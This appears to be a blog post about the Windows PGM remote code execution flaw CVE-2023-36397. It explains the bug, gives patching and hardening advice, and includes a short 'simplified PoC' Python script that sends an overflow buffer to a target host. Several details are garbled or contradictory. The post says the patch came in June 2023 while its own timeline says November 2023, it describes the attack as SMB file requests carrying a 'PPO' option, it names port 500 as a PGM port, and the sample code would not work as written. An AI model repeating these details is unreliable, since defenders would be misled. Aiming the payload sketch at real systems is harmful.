In June 2023, Microsoft patched a critical vulnerability tracked as CVE-2023-36397. This bug lurks in the implementation of Pragmatic General Multicast (PGM) in Windows, and allows for remote code execution (RCE) without user interaction — a nightmare for any sysadmin.
Let’s break down what happened, how the exploit works, and what you can do to protect yourself. We’ll also peek at proof-of-concept code and key resources so you get the full story.
What is Windows PGM?
PGM stands for Pragmatic General Multicast. It’s a network protocol designed for the reliable delivery of multicast data. Windows supports PGM in the AF_PGM protocol family (address family 39). Usually, PGM is used in enterprise messaging apps, like Microsoft Message Queuing (MSMQ).
Key point: Most home users won't use PGM, but it's *enabled by default* on many Windows Server installations.
According to Microsoft
- A remote attacker could send specially crafted file operation requests on a vulnerable system using SMB, triggering memory corruption in Windows' PGM implementation.
Successful exploitation lets attackers run code *with elevated privileges* (SYSTEM!).
🔗 Official advisory:
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-36397
Vulnerable code resides in the PGM protocol stack when handling certain network packets.
- By sending a crafted PPO (Protocol Parameter Option) request over SMB (Server Message Block), attackers can control memory layout in the kernel.
Memory Corruption:
- The bug is a heap overflow that corrupts memory locations in the Windows kernel, letting attackers pivot to executing code via spray techniques.
Exploit Example: Proof of Concept
⚠️ DISCLAIMER: For education only. *Don’t* use against any system you don’t own.
Let's craft a simplified PoC, based on public information discussed in Huntress Labs' write-up:
# CVE-2023-36397 PoC (Simplified)
import socket
PGM_AF = 39 # Address family for PGM
PGM_PORT = 500
TARGET_IP = "TARGET.SERVER.IP.ADDRESS"
# Malicious buffer that overflows heap. (In real exploits, structure/contents are highly specific.)
evil_buffer = b'A' * 1024
def send_pgm_packet():
# On Windows, a SOCK_RDM socket w/ AF_PGM is required; this is a conceptual sketch.
s = socket.socket(PGM_AF, socket.SOCK_RDM)
s.connect((TARGET_IP, PGM_PORT))
s.send(evil_buffer)
print("Malicious PGM packet sent.")
if __name__ == "__main__":
send_pgm_packet()
Real-world exploits combine this with specific packet formatting and memory spraying via SMB, but this shows the general approach.
1. Apply Official Patches
Microsoft patched this in June 2023.
🔗 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-36397
Go to Windows Update or your patch management tool — apply the security update marked for this CVE.
Restrict SMB on firewalls (allow only where necessary).
- Block *unnecessary* PGM ports (e.g., UDP/PGM port 500).
If you don’t need MSMQ or PGM, disable them
# Disable MSMQ
Stop-Service -Name MSMQ
Set-Service -Name MSMQ -StartupType Disabled
Microsoft Security Advisory
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-36397
Huntress Labs (exploit analysis)
https://www.huntress.com/blog/analyzing-cve-2023-36397-windows-pgm-remote-code-execution-vulnerability
ZDI Bug Report
https://www.zerodayinitiative.com/advisories/ZDI-23-819/
Proof-of-Concept discussion:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2023-36397
Conclusion
CVE-2023-36397 is a textbook example of how a low-profile protocol like PGM can become a critical risk. Unpatched Windows servers — especially any exposing SMB to untrusted networks — are at high risk from mass exploitation.
Patch early, limit your attack surface, and audit your network for unused or legacy protocols.
Stay safe, and keep your systems tight!
*Have questions about Windows vulnerabilities or exploitation? Let us know below!*
Timeline
Published on: 11/14/2023 18:15:39 UTC
Last modified on: 11/20/2023 19:55:58 UTC